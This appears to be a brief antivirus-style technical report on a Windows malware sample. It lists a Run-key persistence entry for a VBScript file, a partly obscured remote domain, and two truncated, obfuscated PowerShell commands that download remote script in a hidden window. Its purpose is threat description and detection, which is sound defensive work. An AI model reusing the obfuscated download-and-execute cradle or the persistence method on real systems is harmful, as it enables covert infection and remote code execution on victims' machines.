Technical Information
- [<HKCU>\Software\Microsoft\Windows\CurrentVersion\Run] 'update' = '"%APPDATA%\<File name>.vbs"'
- %APPDATA%\<File name>.vbs
- 'th#.#arth.li':443
- DNS ASK th#.#arth.li
- '%WINDIR%\syswow64\windowspowershell\v1.0\powershell.exe' -noexit $vbs = New-Object -ComObject 'MSScriptControl.ScriptControl';$vbs.Language = 'VBScript';$text='(&(GCM *W-O*)Ne'+'t.We'+'bCl'+'ient).Dow'+'nloa'+'dSt'+'ring(''https://the.earth.li/~sgta...' (with hidden window)
- '%WINDIR%\syswow64\windowspowershell\v1.0\powershell.exe' -noexit $vbs = New-Object -ComObject 'MSScriptControl.ScriptControl';$vbs.Language = 'VBScript';$text='(&(GCM *W-O*)Ne'+'t.We'+'bCl'+'ient).Dow'+'nloa'+'dSt'+'ring(''https://the.earth.li/~sgta...